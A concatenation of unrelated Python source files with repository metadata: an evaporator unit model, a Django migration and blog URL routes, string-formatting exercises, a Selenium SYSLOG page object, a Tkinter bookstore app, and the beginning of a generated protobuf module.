HMF 0.000793
Glucose 0.555
[1] liquid
phase: 'l', T: 361.2 K, P: 101325 Pa
flow (kmol/hr): Water 5.55
AceticAcid 0.00143
Furfural 0.000462
>>> E1.results()
Multi-Effect Evaporator Units E1
Power Rate kW 5.72
Cost USD/hr 0.447
Low pressure steam Duty kJ/hr 3.82e+05
Flow kmol/hr 9.85
Cost USD/hr 2.34
Cooling water Duty kJ/hr -1.15e+05
Flow kmol/hr 78.5
Cost USD/hr 0.0383
Design Area m^2 1.64
Volume m^3 0.986
Purchase cost Condenser USD 3.89e+03
Evaporators USD 2.77e+03
Liquid-ring pump USD 1.24e+04
Total purchase cost USD 1.91e+04
Utility cost USD/hr 2.83
"""
line = 'Multi-Effect Evaporator'
_units = {'Area': 'm^2',
'Volume': 'm^3'}
_F_BM_default = {'Evaporators': 2.45,
'Liquid-ring pump': 1.0,
'Condenser': 3.17}
_N_outs = 2
_N_heat_utilities = 2
#: Residence time (hr)
tau = 0.30
# Evaporator type
_Type = 'Forced circulation'
# Data for simmulation and costing
_evap_data = evaporators[_Type]
@property
def Type(self):
"""Evaporation type."""
return self._Type
@Type.setter
def Type(self, evap_type):
try:
self._evap_data = evaporators[evap_type]
except KeyError:
dummy = str(evaporators.keys())[11:-2]
raise ValueError(f"Type must be one of the following: {dummy}")
self._Type = evap_type
@property
def V_definition(self):
"""[str] Must be one of the following:
* 'Overall' - Defines attribute `V` as the overall molar fraction evaporated.
* 'First-effect' - Defines attribute `V` as the molar fraction evaporated in the first effect.
"""
return self._V_definition
@V_definition.setter
def V_definition(self, V_definition):
V_definition = V_definition.capitalize()
if V_definition in ('Overall', 'First-effect'):
self._V_definition = V_definition
else:
raise ValueError("V_definition must be either 'Overall' or 'First-effect'")
def __init__(self, ID='', ins=None, outs=(), thermo=None, *, P, V, V_definition='Overall'):
Unit.__init__(self, ID, ins, outs, thermo)
self.P = P #: tuple[float] Pressures describing each evaporator (Pa).
self.V = V #: [float] Molar fraction evaporated.
self.V_definition = V_definition
self._V_first_effect = None
self._reload_components = True
self.components = {}
def reset_cache(self):
self._reload_components = True
def load_components(self):
P = self.P
thermo = self.thermo
# Create components
self._N_evap = n = len(P) # Number of evaporators
first_evaporator = Flash(None, outs=(None, None), P=P[0], thermo=thermo)
# Put liquid first, then vapor side stream
evaporators = [first_evaporator]
for i in range(1, n):
evap = Evaporator_PQ(None, outs=(None, None, None), P=P[i], Q=0, thermo=thermo)
evaporators.append(evap)
condenser = HXutility(None, outs=[None], thermo=thermo, V=0)
condenser.parent = self
self.heat_utilities = (first_evaporator.heat_utilities[0],
condenser.heat_utilities[0])
mixer = Mixer(None, outs=[None], thermo=thermo)
components = self.components
components['evaporators'] = evaporators
components['condenser'] = condenser
components['mixer'] = mixer
# Set-up components
other_evaporators = evaporators[1:]
first_evaporator.ins[:] = [i.copy() for i in self.ins]
# Put liquid first, then vapor side stream
ins = [first_evaporator.outs[1], first_evaporator.outs[0]]
for evap in other_evaporators:
evap.ins[:] = ins
ins = [evap.outs[1], evap.outs[0]]
def _V_overall(self, V_first_effect):
first_evaporator, *other_evaporators = self.components['evaporators']
first_evaporator.V = V_overall = V_first_effect
first_evaporator._run()
for evap in other_evaporators:
evap._run()
V_overall += (1. - V_overall) * evap.V
return V_overall
def _V_overall_objective_function(self, V_first_effect):
return self._V_overall(V_first_effect) - self.V
def _run(self):
out_wt_solids, liq = self.outs
ins = self.ins
if self.V == 0:
out_wt_solids.copy_like(ins[0])
for i in self.heat_utilities:
i.empty(); i.heat_exchanger = None
liq.empty()
self._reload_components = True
return
if self._reload_components:
self.load_components()
self._reload_components = False
if self.V_definition == 'Overall':
P = tuple(self.P)
self.P = list(P)
for i in range(self._N_evap-1):
if self._V_overall(0.) > self.V:
self.P.pop()
self.load_components()
self._reload_components = True
else:
break
self.P = P
self._V_first_effect = flx.IQ_interpolation(self._V_overall_objective_function,
0., 1., None, None, self._V_first_effect,
xtol=1e-9, ytol=1e-6,
checkiter=False)
V_overall = self.V
else:
V_overall = self._V_overall(self.V)
n = self._N_evap # Number of evaporators
components = self.components
evaporators = components['evaporators']
condenser = components['condenser']
mixer = components['mixer']
last_evaporator = evaporators[-1]
# Condensing vapor from last effector
outs_vap = last_evaporator.outs[0]
condenser.ins[:] = [outs_vap]
condenser._run()
outs_liq = [condenser.outs[0]] # list containing all output liquids
# Unpack other output streams
out_wt_solids.copy_like(last_evaporator.outs[1])
for i in range(1, n):
evap = evaporators[i]
outs_liq.append(evap.outs[2])
# Mix liquid streams
mixer.ins[:] = outs_liq
mixer._run()
liq.copy_like(mixer.outs[0])
mixed_stream = MultiStream(None, thermo=self.thermo)
mixed_stream.copy_flow(self.ins[0])
mixed_stream.vle(P=last_evaporator.P, V=V_overall)
out_wt_solids.mol = mixed_stream.imol['l']
liq.mol = mixed_stream.imol['g']
def _design(self):
if self.V == 0: return
# This functions also finds the cost
A_range, C_func, U, _ = self._evap_data
components = self.components
evaporators = components['evaporators']
Design = self.design_results
Cost = self.baseline_purchase_costs
CE = bst.CE
first_evaporator = evaporators[0]
heat_exchanger = first_evaporator.heat_exchanger
hu = heat_exchanger.heat_utilities[0]
duty = first_evaporator.H_out - first_evaporator.H_in
Q = abs(duty)
Tci = first_evaporator.ins[0].T
Tco = first_evaporator.outs[0].T
hu(duty, Tci, Tco)
Th = hu.inlet_utility_stream.T
LMTD = ht.compute_LMTD(Th, Th, Tci, Tco)
ft = 1
A = abs(compute_heat_transfer_area(LMTD, U, Q, ft))
first_evaporator.baseline_purchase_costs['Evaporator'] = C = C_func(A, CE)
self._evap_costs = evap_costs = [C]
# Find condenser requirements
condenser = components['condenser']
condenser._summary()
Cost['Condenser'] = condenser.purchase_cost
# Find area and cost of evaporators
As = [A]
A_min, A_max = A_range
evap = evaporators[-1]
for evap in evaporators[1:]:
Q = evap.design_results['Heat transfer']
if Q <= 1e-12:
As.append(0.)
evap_costs.append(0.)
else:
Tc = evap.outs[0].T
Th = evap.outs[2].T
LMTD = Th - Tc
A = compute_heat_transfer_area(LMTD, U, Q, 1.)
As.append(A)
if settings.debug and not A_min < A < A_max:
warn(f'area requirement ({A}) is out of range, {A_range}')
evap_costs.append(C_func(A, CE))
self._As = As
Design['Area'] = A = sum(As)
Design['Volume'] = total_volume = self._N_evap * self.tau * self.ins[0].F_vol
Cost['Evaporators'] = sum(evap_costs)
# Calculate power
power, cost = compute_vacuum_system_power_and_cost(
F_mass=0, F_vol=0, P_suction=evap.outs[0].P,
vessel_volume=total_volume,
vacuum_system_preference='Liquid-ring pump')
Cost['Liquid-ring pump'] = cost
self.power_utility(power)
|
[
"[email protected]"
] | |
859652d89a14584f5e955cc3ad819c804f555e3b
|
5bfca95abf14f7bb0ff29b58b018fc9062d3f837
|
/apps/first_draft/migrations/0001_initial.py
|
ac8c2856ce7f990fcbd46afa84be29c6e4323981
|
[] |
no_license
|
wdudek82/django-ogame-clone
|
621afb20ea2dd3c0f2e4b93dfdd604e0628bd7b8
|
472971da826d078176a5d619b3b5cad89e3d1c5c
|
refs/heads/master
| 2021-09-08T15:19:49.407650 | 2017-11-26T19:14:48 | 2017-11-26T19:14:48 | 124,670,158 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,675 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-15 20:31
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Building',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255, unique=True)),
('base_cost', models.PositiveIntegerField()),
],
),
migrations.CreateModel(
name='PlayerBuilding',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('level', models.PositiveIntegerField(default=0)),
('acceleration', models.PositiveIntegerField(choices=[(1, 0), (2, 1), (3, 2), (4, 3), (5, 4), (6, 5), (7, 6), (8, 7), (9, 8), (10, 9), (11, 10), (12, 11), (13, 12), (14, 13), (15, 14), (16, 15), (17, 16), (18, 17), (19, 18), (20, 19), (21, 20), (22, 21), (23, 22), (24, 23), (25, 24), (26, 25), (27, 26), (28, 27), (29, 28), (30, 29), (31, 30), (32, 31), (33, 32), (34, 33), (35, 34), (36, 35), (37, 36), (38, 37), (39, 38), (40, 39), (41, 40), (42, 41), (43, 42), (44, 43), (45, 44), (46, 45), (47, 46), (48, 47), (49, 48), (50, 49), (51, 50), (52, 51), (53, 52), (54, 53), (55, 54), (56, 55), (57, 56), (58, 57), (59, 58), (60, 59), (61, 60), (62, 61), (63, 62), (64, 63), (65, 64), (66, 65), (67, 66), (68, 67), (69, 68), (70, 69), (71, 70), (72, 71), (73, 72), (74, 73), (75, 74), (76, 75), (77, 76), (78, 77), (79, 78), (80, 79), (81, 80), (82, 81), (83, 82), (84, 83), (85, 84), (86, 85), (87, 86), (88, 87), (89, 88), (90, 89), (91, 90), (92, 91), (93, 92), (94, 93), (95, 94), (96, 95), (97, 96), (98, 97), (99, 98), (100, 99), (101, 100)])),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('building', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='first_draft.Building')),
('player', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PlayerResouce',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('amount', models.PositiveIntegerField(default=0)),
('player', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Resources',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(max_length=255, unique=True)),
],
options={
'verbose_name_plural': 'Resources',
},
),
migrations.AddField(
model_name='playerresouce',
name='resource',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='first_draft.Resources'),
),
migrations.AlterUniqueTogether(
name='playerbuilding',
unique_together=set([('player', 'building')]),
),
]
|
[
"[email protected]"
] | |
8ad2bcbe89aa890553ba807bcca337ba1fcecfa0
|
50e4a9f7d2126d0bee1b97126e9a60de7314ccce
|
/iot/chapter3/ex08-03.py
|
7beb00abdc05afdf5bc8438b56a9a5a28e4d2f39
|
[] |
no_license
|
heohyoyeong/test_python_basic
|
649d5a0ed671a883885c52033a24362149435114
|
1ef9583e7e1bd735c15b0f6af57f39809b041403
|
refs/heads/master
| 2022-11-21T09:13:08.632555 | 2020-07-29T02:21:11 | 2020-07-29T02:21:11 | 283,376,126 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,047 |
py
|
def main():
s= "독도는 일본땅. 대마도도 일본땅"
print(s)
print(s.replace("일본","한국"))
print(s)
def main2():
message="안녕하세요"
print(message.center(30))
print(message.ljust(30))
print(message.rjust(30))
def main3():
trabler = """
강나루 거너서
밀밭 길을
구름에 달 가듯이
가는 나그네
"""
poet= trabler.splitlines()
for line in poet:
print(line.center(30))
def main4():
price= 500
print("궁금하면" + str(price)+ "원!")
mon=8
day=15
anni="광복절"
print("%d월 %d일은 %s이다."%(mon,day,anni))
def main5():
value=123
print("###%d###"%value)
print("###%5d###" % value)
print("###%10d###" % value)
print("###%-10d###" % value)
print("###%1d###" % value)
def main6():
price= [30,13500,2000]
for p in price:
print("가격 : %d원"%p)
print
for p in price:
print("가격 : %7d원"%p)
print
for p in price:
print("가격 : %-7d원"%p)
print
def main7():
f=123.1234567
print("%10f" % f)
print("%10.8f" % f)
print("%10.5f" % f)
print("%10.2f" % f)
print("%.2f" % 123.126)
def main8():
name= "한결"
age=16
height= 178.8
print("이름:{}, 나이: {}, 키: {}".format(name,age,height))
print("이름:{:s}, 나이: {:d}, 키: {:f}".format(name, age, height))
print("이름:{:4s}, 나이: {:3d}, 키: {:.2f}".format(name, age, height))
def main9():
name = "한결"
age = 16
height = 162.5
print("이름:{0}, 나이: {1}, 키: {2}".format(name, age, height))
print("이름:{2}, 나이: {1}, 키: {0}".format(height, age, name))
print("이름:{name}, 나이: {age}, 키: {height}".format(age=20, height=160.9,name="길동"))
def main10():
name="한결"
age= 16
height= 162.5
print(f"이름: {name}, 나이:{age}, 키:{height:.2f}")
# main()
# main2()
# main3()
# main4()
# main5()
# main6()
# main7()
# main8()
# main9()
# main10()
|
[
"[email protected]"
] | |
1a72065a811121f0dd9d16e8dd072b751fba6a6a
|
917a99fdf14097dd8001b5c98cc48c8716f8f969
|
/webElement/ass_service/syslogElement.py
|
8bffc624415e17423f022ce3b8b9a646794ed0be
|
[] |
no_license
|
isomper/testIsomptySecret
|
722eba4cbefe9495a3292d8d10e8ad9c4a34c8a7
|
968bbee05af730cfb7717f1531286f11a7f99cf3
|
refs/heads/master
| 2020-03-19T07:29:28.487913 | 2018-07-13T06:25:50 | 2018-07-13T06:25:50 | 136,118,583 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,408 |
py
|
#coding=utf-8
u'''
#文件名:
#被测软件版本号:V2.8.1
#作成人:李择优
#生成日期:2018/1/24
#模块描述:SYSLOG
#历史修改记录
#修改人:
#修改日期:
#修改内容:
'''
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import time
sys.path.append("/testIsompSecret/common/")
from _icommon import getElement,selectElement,frameElement,commonFun
from _cnEncode import cnEncode
from _log import log
sys.path.append("/testIsompSecret/webElement/ass_service/")
from ntpElement import NtpService
class Syslog:
#运行状态开关
SWITCH = "btn_qh"
#IP
HOST = "host"
#端口
PORT = "port"
#协议
PROTOCOL = "protocol"
#标识
IDENT = "ident"
#机制
FACILITY = "facility"
#测试按钮
TEST_BUTTON = "test_syslog"
#保存按钮
SAVE_BUTTON = "save_syslog"
def __init__(self,driver):
self.driver = driver
self.log = log()
self.getElem = getElement(driver)
self.select = selectElement(driver)
self.frameElem = frameElement(driver)
self.cmf = commonFun(driver)
self.ntp = NtpService(driver)
self.cnEnde = cnEncode()
u'''填写变量内容
parameters:
var_text : 变量内容
value : 定位方式值
'''
def set_common_func(self,var_text,value):
try:
revar_text = self.cnEnde.is_float(var_text)
var_elem =self.getElem.find_element_with_wait_EC("id",value)
var_elem.clear()
var_elem.send_keys(revar_text)
except Exception as e:
print ("set user common text error: ") + str(revar_text) + str(e)
u'''输入IP
parameters:
setIp : IP
'''
def set_ip(self,setIp):
return self.set_common_func(setIp,self.HOST)
u'''输入端口
parameters:
setPort : 端口
'''
def set_port(self,setPort):
return self.set_common_func(setPort,self.PORT)
u'''选择协议
Parameters:
value:select选项中的value属性值,udp代表UDP,tcp代表TCP,nix_syslog代表nix_syslog
'''
def set_protocol(self, value):
valu = self.cnEnde.is_float(value)
self.frameElem.from_frame_to_otherFrame("rigthFrame")
selem = self.getElem.find_element_with_wait_EC("id",self.PROTOCOL)
self.select.select_element_by_value(selem, valu)
u'''输入标识
parameters:
setIdent : 标识
'''
def set_ident(self,setIdent):
return self.set_common_func(setIdent,self.IDENT)
u'''选择机制
Parameters:
value:select选项中的value属性值,32代表facility
'''
def set_facility(self, value):
valu = self.cnEnde.is_float(value)
self.frameElem.from_frame_to_otherFrame("rigthFrame")
selem = self.getElem.find_element_with_wait_EC("id",self.FACILITY)
self.select.select_element_by_value(selem, valu)
u'''点击测试按钮'''
def test_button(self):
self.frameElem.from_frame_to_otherFrame("rigthFrame")
self.getElem.find_element_wait_and_click_EC("id",self.TEST_BUTTON)
u'''点击保存按钮'''
def save_button(self):
self.frameElem.from_frame_to_otherFrame("rigthFrame")
self.getElem.find_element_wait_and_click_EC("id",self.SAVE_BUTTON)
u'''改变开关状态'''
def change_switch_status(self):
self.frameElem.from_frame_to_otherFrame("rigthFrame")
try:
button_elem = self.getElem.find_element_with_wait_EC("id",self.SWITCH)
class_attr = button_elem.get_attribute("class")
off_status = "switch_off"
on_status = "switch_on"
if class_attr == on_status:
self.ntp.click_left_moudle(1)
self.frameElem.from_frame_to_otherFrame("rigthFrame")
button_elem = self.getElem.find_element_with_wait_EC("id",self.SWITCH)
time.sleep(1)
button_elem.click()
button_elem.click()
else:
button_elem.click()
except Exception as e:
print ("Change button status error: ") + str(e)
|
[
"[email protected]"
] | |
65491b4cf6af511302a7fd9c889aaa1981d32a99
|
69f313e9f97dd50856be74f0f5a13ffad4fc2373
|
/LibraryFront.py
|
122cf64f7ed6bb854b053ef54e3c2fee03472a28
|
[] |
no_license
|
akimbaev/Python_tkinter
|
f2b9e57601fa068aff71c87be2c861124f48972f
|
5bf5facc9eb40fb6e8301aa75078b8e53ff50d2d
|
refs/heads/master
| 2022-11-15T00:16:27.576341 | 2020-06-30T14:25:37 | 2020-06-30T14:25:37 | 273,231,482 | 0 | 2 | null | 2020-06-26T15:30:17 | 2020-06-18T12:26:08 |
Python
|
UTF-8
|
Python
| false | false | 9,760 |
py
|
from tkinter import *
from LibraryBackend import Database
import os.path
import tkinter as tk
import tkinter.ttk as ttk
import matplotlib
import pylab
matplotlib.use("TkAgg")
# from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from matplotlib.figure import Figure
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import style
import pylab as pl
import sqlite3
database = Database("books.db")
# with sqlite3.connect('books.db') as conn:
# cur = conn.cursor()
from models.Item import Item
conn = sqlite3.connect("books.db")
cur = conn.cursor()
from models.Store import Store
from models.ShoppingCart import ShoppingCart
cart = ShoppingCart()
class Window(object):
class_var = 1
updated_list=[]
def __init__(self,window):
self.window = window
self.window.wm_title("The Book Store")
l1 = Label(window, text="Title")
l1.grid(row=0, column=0)
l2 = Label(window, text="Author")
l2.grid(row=0, column=2)
l3 = Label(window, text="Year")
l3.grid(row=1, column=0)
l4 = Label(window, text="ISBN")
l4.grid(row=1, column=2)
self.title_text = StringVar()
self.e1 = Entry(window, textvariable=self.title_text)
self.e1.grid(row=0, column=1)
self.author_text = StringVar()
self.e2 = Entry(window, textvariable=self.author_text)
self.e2.grid(row=0, column=3)
self.year_text = StringVar()
self.e3 = Entry(window, textvariable=self.year_text)
self.e3.grid(row=1, column=1)
self.ISBN_text = StringVar()
self.e4= Entry(window, textvariable=self.ISBN_text)
self.e4.grid(row=1, column=3)
self.list1 = Listbox(window, height=6, width=35)
self.list1.grid(row=2, column=0, rowspan=6, columnspan=2,padx=5)
self.list1.bind('<<ListboxSelect>>', self.get_selected_row)
# now we need to attach a scrollbar to the listbox, and the other direction,too
sb1 = Scrollbar(window)
sb1.grid(row=2, column=2, rowspan=6)
self.list1.config(yscrollcommand=sb1.set)
sb1.config(command=self.list1.yview)
b1 = Button(window, text="View all", width=12, command=self.view_command)
b1.grid(row=2, column=3)
b2 = Button(window, text="Search entry", width=12, command=self.search_command)
b2.grid(row=3, column=3)
b3 = Button(window, text="Add entry", width=12, command=self.add_command)
b3.grid(row=4, column=3)
b4 = Button(window, text="Update selected", width=12, command=self.update_command)
b4.grid(row=5, column=3)
b5 = Button(window, text="Delete selected", width=12, command=self.delete_command)
b5.grid(row=6, column=3)
# b6 = Button(window, text="Top searched", width=12, command=self.animate)
# b6.grid(row=7, column=3)
b6 = Button(window, text="Top searched", width=12, command=self.animate)
b6.grid(row=7, column=3)
b7 = Button(window, text="Close", width=12, command=window.destroy)
b7.grid(row=8, column=3)
b8 = Button(window, text="Add to cart ", width=12, cursor="hand2", command=self.addItemToCart)
b8.grid(row=9, column=0)
b9 = Button(window, text="Go to cart ", width=12, command=self.viewCart)
b9.grid(row=9, column=1)
def viewCart(self):
cartWindow = Toplevel()
cartWindow.title("The Cart")
cartWindow.grab_set()
global cart
cartItems = cart.getCartItems()
cartItemsLabelFrame = LabelFrame(cartWindow,text="Cart Items")
cartItemsLabelFrame.pack(fill="both", expand="yes", padx="20", pady="10")
cartItemsFrame = Frame(cartItemsLabelFrame, padx=3, pady=3)
cartItemsFrame.pack()
index = 0
for item in cartItems:
itemFrame = Frame(cartItemsFrame, pady="5")
itemFrame.pack(fill="both", expand="yes")
nameLabel = Label(itemFrame, text=item.name,font=("Candara",15),fg="blue")
priceLabel = Label(itemFrame, text="$ %s"%item.price,font=("Candara",13),fg="red")
addToCartBtn = Button(itemFrame, text="Remove From Cart", font=("Candara",11,"bold"),fg="red",bg="white",cursor="hand2", command=lambda i=index: removeFromCart(i,cartWindow) )
nameLabel.pack(side="left")
priceLabel.pack(side="left")
addToCartBtn.pack(side="right" )
index += 1
checkOutFrame = Frame(cartWindow, pady="10")
totalPriceLabel = Label(checkOutFrame, text="Total Price : $ %s" % cart.getTotalPrice(), font=("Candara",14,"bold"))
totalPriceLabel.pack(side="left")
buyBtn = Button(checkOutFrame, text="Buy Now", font=("Candara",15,"bold"),bg="white",cursor="hand2", command=lambda : buyCommand(cartWindow))
buyBtn.pack(side="left",padx="10")
checkOutFrame.pack()
backToStoreBtn = Button(cartWindow, text="Back To Store", font=("Candara",15,"bold"),bg="white",cursor="hand2",command=cartWindow.destroy)
backToStoreBtn.pack(pady="6")
cartWindow.mainloop()
def addItemToCart(self):
name1=self.title_text.get()
store = Store()
from models.Item import Item
Item.name=name1
Item.price=100
cart.addToCart(Item)
# messagebox.showinfo(title="Success" , message="Item %s Added To The Cart !!"%item.name )
def get_selected_row(self,event): #the "event" parameter is needed b/c we've binded this function to the listbox
try:
index = self.list1.curselection()[0]
self.selected_tuple = self.list1.get(index)
self.e1.delete(0,END)
self.e1.insert(END,self.selected_tuple[1])
self.e2.delete(0, END)
self.e2.insert(END,self.selected_tuple[2])
self.e3.delete(0, END)
self.e3.insert(END,self.selected_tuple[3])
self.e4.delete(0, END)
self.e4.insert(END,self.selected_tuple[4])
except IndexError:
pass #in the case where the listbox is empty, the code will not execute
def view_command(self):
self.list1.delete(0, END) # make sure we've cleared all entries in the listbox every time we press the View all button
for row in database.view():
self.list1.insert(END, row)
def set_const(self, new_var):
Window.class_var = new_var
def get_const(self):
return Window.class_var
def set_new_list(self, new_list):
Window.updated_list = new_list
def get_updated_list(self):
return Window.updated_list
def animate(self):
try:
val = self.get_updated_list()
sql = "INSERT INTO top_book (title, counter) VALUES (?, ?)"
cur.executemany(sql, val)
cur.execute("SELECT COUNT(DISTINCT title) FROM top_book;")
num_of_books = cur.fetchall()
dist_books = num_of_books[0][0]
xs = []
x_book_name=[]
ys = []
cur.execute("SELECT title from top_book")
for i in range(dist_books):
xs.append(i)
for i in range(dist_books):
one_book=cur.fetchone()
x_book_name.append(one_book[0])
cur.execute("SELECT counter from top_book")
for i in range(dist_books):
one_book_occur=cur.fetchone()
ys.append(one_book_occur[0])
#Type1
plt.figure(figsize=(8,6))
plt.suptitle('Categorical Plotting')
plt.style.use('ggplot')
plt.plot(x_book_name, ys)
plt.xticks(rotation=15)
conn.commit()
plt.show()
conn.commit()
conn.close()
except:
print("No data is chosen for building a graph")
conn.commit()
conn.close()
def search_command(self):
self.list1.delete(0, END)
for row in database.search(self.title_text.get(), self.author_text.get(), self.year_text.get(), self.ISBN_text.get()):
self.list1.insert(END, row)
cur.execute("SELECT title FROM book")
var = cur.fetchall()
new_table=[]
rrr = self.get_updated_list()
if (len(rrr) == 0) :
cur.execute("CREATE TABLE IF NOT EXISTS top_book (title VARCHAR(255), counter INTEGER);")
get_title = [i[0] for i in var]
get_counter = []
for i in range(len(get_title)):
if(get_title[i] == self.title_text.get()):
get_counter.append(1)
else:
get_counter.append(0)
val = list(zip(get_title, get_counter))
sql = "INSERT INTO top_book (title, counter) VALUES (?, ?)"
cur.executemany(sql, val)
cur.execute('SELECT * FROM top_book')
self.set_new_list(cur.fetchall())
print("came here")
conn.commit()
new_table = self.get_updated_list()
sql = "INSERT INTO top_book (title, counter) VALUES (?, ?)"
cur.executemany(sql, list(set(new_table)))
cur.execute("SELECT max(counter) FROM top_book WHERE title=?", (self.title_text.get(), ))
to_increment = cur.fetchall()[0][0]
cur.execute("""UPDATE top_book
SET counter = counter + 1
WHERE title = ? and counter=?""", (self.title_text.get(),to_increment))
cur.execute("SELECT * FROM top_book")
list_to_save = cur.fetchall()
self.set_new_list(list(set(list_to_save)))
print(list(set(list_to_save)))
conn.commit()
return list(set(list_to_save))
conn.close()
def add_command(self):
database.insert(self.title_text.get(), self.author_text.get(), self.year_text.get(), self.ISBN_text.get())
self.list1.delete(0, END)
self.list1.insert(END, (self.title_text.get(), self.author_text.get(), self.year_text.get(), self.ISBN_text.get()))
def delete_command(self):
database.delete(self.selected_tuple[0])
self.view_command()
def update_command(self):
#be careful for the next line ---> we are updating using the texts in the entries, not the selected tuple
database.update(self.selected_tuple[0],self.title_text.get(), self.author_text.get(), self.year_text.get(), self.ISBN_text.get())
self.view_command()
#code for the GUI (front end)
window = Tk()
window.geometry("580x240")
Window(window)
window.mainloop()
|
[
"[email protected]"
] | |
66c6fd7546d0d7ae63a823f1182cfd17e3f29d36
|
24ff40115475130039eb42c180932fb17feb8f42
|
/mysite/blog/urls.py
|
8632bb94424bb026d765670ddfdabc382f4cbac1
|
[] |
no_license
|
ushnuel/blog_project
|
1bac23a033ab0d1bd38e034819b2f88b52390640
|
0816269fefa45c641d2c8413acbcd32b80972651
|
refs/heads/master
| 2020-05-18T23:41:25.082360 | 2019-05-03T06:54:17 | 2019-05-03T06:54:17 | 184,717,708 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 973 |
py
|
from django.conf.urls import url
from blog import views
urlpatterns = [
url(r'^$', views.PostListView.as_view(), name='post_list'),
url(r'^about/$', views.AboutView.as_view(), name='about'),
url(r'^post/(?P<pk>\d+)$', views.PostDetailView.as_view(), name='post_detail'),
url(r'^post/new/$', views.PostCreateView.as_view(), name='post_new'),
url(r'^post/(?P<pk>\d+)/edit/$', views.PostUpdateView.as_view(), name='post_update'),
url(r'^post/(?P<pk>\d+)/delete/$', views.PostDeleteView.as_view(), name='post_delete'),
url(r'^drafts/$',views.DraftListView.as_view(), name='post_draft_list'),
url(r'^post/(?P<pk>\d+)/comment/$', views.add_comment_to_post, name='add_comment_to_post'),
url(r'comment/(?P<pk>\d+)/approve/$', views.approve_comment, name='approve_comment'),
url(r'comment/(?P<pk>\d+)/remove/$', views.comment_remove, name='comment_remove'),
url(r'post/(?P<pk>\d+)/publish/$', views.post_publish, name='post_publish'),
]
|
[
"[email protected]"
] | |
1c795934bcbbc615b180f995d41268c824795d6a
|
9d8f1868aa61ff4f4947d98c8fea905c71dee6b7
|
/pgoapi/protos/POGOProtos/Settings/Master/ItemSettings_pb2.py
|
dba8f747c61a7af895af2a2a0abcf3a31087dd73
|
[
"MIT"
] |
permissive
|
erhan-/pokefarm
|
5c3a30a5708417ef68c0537ff879d472fb62d774
|
797ad72d44bdccd2b7a32080d259d187988bd4ab
|
refs/heads/master
| 2023-05-24T06:50:52.169989 | 2021-03-12T12:34:25 | 2021-03-12T12:34:25 | 63,973,073 | 0 | 0 |
NOASSERTION
| 2023-05-22T21:40:56 | 2016-07-22T17:59:20 |
Python
|
UTF-8
|
Python
| false | true | 13,742 |
py
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Settings/Master/ItemSettings.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos.Enums import ItemCategory_pb2 as POGOProtos_dot_Enums_dot_ItemCategory__pb2
from POGOProtos.Inventory import ItemId_pb2 as POGOProtos_dot_Inventory_dot_ItemId__pb2
from POGOProtos.Inventory import ItemType_pb2 as POGOProtos_dot_Inventory_dot_ItemType__pb2
from POGOProtos.Settings.Master.Item import FoodAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FoodAttributes__pb2
from POGOProtos.Settings.Master.Item import PotionAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PotionAttributes__pb2
from POGOProtos.Settings.Master.Item import ReviveAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ReviveAttributes__pb2
from POGOProtos.Settings.Master.Item import BattleAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_BattleAttributes__pb2
from POGOProtos.Settings.Master.Item import IncenseAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_IncenseAttributes__pb2
from POGOProtos.Settings.Master.Item import PokeballAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PokeballAttributes__pb2
from POGOProtos.Settings.Master.Item import FortModifierAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FortModifierAttributes__pb2
from POGOProtos.Settings.Master.Item import EggIncubatorAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_EggIncubatorAttributes__pb2
from POGOProtos.Settings.Master.Item import ExperienceBoostAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ExperienceBoostAttributes__pb2
from POGOProtos.Settings.Master.Item import InventoryUpgradeAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_InventoryUpgradeAttributes__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Settings/Master/ItemSettings.proto',
package='POGOProtos.Settings.Master',
syntax='proto3',
